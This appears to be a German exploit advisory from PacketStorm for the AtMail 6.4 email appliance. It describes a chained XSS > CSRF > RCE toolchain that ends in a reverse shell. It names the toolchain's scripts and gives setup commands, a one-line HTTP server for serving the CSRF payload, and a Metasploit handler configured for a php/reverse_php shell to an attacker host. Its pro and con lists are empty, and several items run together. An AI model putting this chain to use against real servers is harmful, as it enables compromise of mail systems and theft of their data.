
AtMail E-Mail-Server-Appliance 6.4 - Exploit-Toolchain (XSS > CSRF > RCE)
[PacketStorm] [WLB-2020080010]
Haftungsausschluss: Diese Exploit-Toolchain wurde von EDB-ID 20009 inspiriert.
Das Ziel dieser Exploit-Toolchain ist es, EDB-ID 20009 zu ersetzen.
Vorteile dieser Toolchain gegenüber dem EDB-ID 20009-Exploit:
Nachteile des EDB-ID 20009-Exploits:
msfvenomVoraussetzungen unter ArchLinux installieren:
$ sudo pacman -S metasploit tar ruby
Exploit-Dateien:
config.yml enthält die Toolchain-Konfigurationexploit.sh der Exploit-Wrapper, der ausgeführt werden mussxss_mail.rb sendet die E-Mail mit dem XSS an den Administrator über den Atmail-SMTP-Server (unauthentifiziert).csrf_prepare.rb bereitet die CSRF-Payload vor (setzt das Ziel und kodiert das Plugin-Archiv)rce_prepare.rb bereitet den RCE vor (generiert die Reverse Shell und erstellt das Plugin-Archiv)csrf_plugin.js die vorbereitete CSRF-Payloadnoraj/ Ordner mit der unkomprimierten Plugin-ArchitekturDie Exploit-Toolchain erfordert nur 2 manuelle Schritte:
config.yml bearbeitenexploit.sh startenAber bevor der Angriff gestartet wird, muss ein Webserver die JavaScript-CSRF-Datei ausliefern und ein Reverse-Shell-Listener auf die Verbindung warten. Der Angriff sieht also eher so aus:
config.yml bearbeitencsrf_plugin.js ausliefertexploit.sh startenBeispiel für einen einzeiligen HTTP-Server:
$ ruby -run -e httpd . -p 8000
Beispiel für einen Reverse-Shell-Listener:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload php/reverse_php
payload => php/reverse_php
msf5 exploit(multi/handler) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > run